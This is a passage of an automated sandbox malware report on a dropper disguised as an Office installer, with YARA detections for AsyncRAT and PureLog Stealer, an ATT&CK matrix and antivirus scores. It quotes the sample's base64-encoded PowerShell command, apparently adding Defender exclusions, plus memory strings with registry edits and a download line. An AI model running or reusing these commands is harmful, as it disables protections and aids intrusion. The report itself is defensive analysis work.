Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajageadgb6acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagiadabkacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagoacqbxacmapgagac0argbvahiaywblacaapaajahoacwbqacmapga="
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajageadgb6acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagiadabkacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagoacqbxacmapgagac0argbvahiaywblacaapaajahoacwbqacmapga="			Jump to behavior

Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^q
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: Office install DVDabeW9-KDdabcdefg50cfadf4-6ad2-4bd2-9981-c7b5c05a8c67CW9b4e8K4-JK298-aTYR-CR4K7D-RJRePath7XX-KQBKV-4XQT-2NfCreate ISO: ace59gFlag Library not initialisedBK-26Shell_TrayWndiaria2sl-sisl-SIH4H-JH9380ed cdnbaseurl.16=http://officecdn.microsoft.com/pr/Office 2013 StandardVL KMS ClientBelizeOffScrubC2R.vbs ALL /NoCancel /OSE 2>&1 b= storeid= forceupgrade=True piniconstotaskbar=False FV7-KQX\|VisioProRetail.16YRFb98-9Basque/t /f /IM IntegratedOffice.exe-nop -c "$Tls12 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $Tls12; (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData','proxy44174279bJ48RF-QFNorwegian-d68a-4Not joined to any domain or groupadd "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\OSM\preventedapplications" /v "visiosolution" /t REG_DWORD /d 1 /fWhen downloading the distribution, use one threadPC-RHGrooveVLHQW-9RHpOffice 2016-2024 C2R Licenses (s64Beta2_OneNoteVLMondoVolumexpiGJH-9CTY7WJ-YQM7-J9ac4StandardVLac6a45c5bfb-2d5CastilianProductReleaseId id=RGOffice\Data\branch.txtv1.142a74b.logfiles9ca-cd79-4add "HKCU\Software\Microsoft\Office\16.0\OSM" /v "EnableUpload" /t REG_DWORD /d 0 /f/i64MJVOffice 2019 Standard2019VL KMS Client AE-a53d-450cacscript.exe //NoLogoproductstoremove={GetModuleFileNameExWONENOTE.EXEWMR-QKG9HD-MQX\|ProofingTools}Office 2019 Outlook2019VL KMS Client AEcompilers\pbcompiler.exe" P3-B64c7-11cTXY-MG2Office 2010 Beta2 Standard KMS ClientBB0d862user32.dll\Office Installer+.ini/Office/Data/99-DXOffice 2010 Beta1 Mondo KMS ClientYBJOffice 2016 WordVL KMS Client23bcBDRTWindowsLicensed[0-9]{2}\.[0-9]{1}\.[0-9]{4,5}\.[0-9]{4,5}_[0-9]{4}-[0-9]{2}-[0-9]{2}_[0-9]{2}\.[0-9]{2}\.[0-9]{2}rubc24\Office Installer.exeBFMJ-B6abcefg6c255DeleteVolumeMountPointA308-8cb4-828WG-BK4627BDP-RDY9d3BJYHM-V68",openBMc85da06187YC7#32770Oriyad8cBeta2_StandardVLd873EnglishWindows Vista mediatype.16=Local sourcetype.16=Local version.16=\o16files\c2rpridslicensefiles_auto.xml1c8-8YFY-9WPYM3-7J2EstonianLicenses\Program Files\Microsoft Office\root\Office16\BTOneNoteVolumeCWGC6CWHGX-PHRXR-B8KC8b75-bSetLayeredWindowAttributesPortugueseSHEmptyRecycleBinAAMD64MK4-8B7Finland5b1c609e3Microsoft_LTSC2024 update channel
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^q%
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Queries volume information: C:\Users\user\AppData\Local\Vulvvmkewji.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Queries volume information: C:\Users\user\AppData\Roaming\Lxfrfbi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Queries volume information: C:\Users\user\AppData\Roaming\Lxfrfbi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe

Code function: 4_2_00007FF6C7EE5890 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF6C7EE5890

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4addde8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4c9de48.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4b1de08.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4abddc8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.6d69838.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4e9de68.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7730000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7730000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4addde8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4c9de48.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4b1de08.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4abddc8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.6d69838.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4e9de68.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7730000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.7730000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	3 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Install Root Certificate	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	331 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	51 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	51 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Gm602axA2d.exe	76%	ReversingLabs	Win32.Dropper.Dapato
Gm602axA2d.exe	61%	Virustotal		Browse
Gm602axA2d.exe	100%	Avira	TR/Dropper.Gen
Gm602axA2d.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Office Installer.exe	100%	Joe Sandbox ML
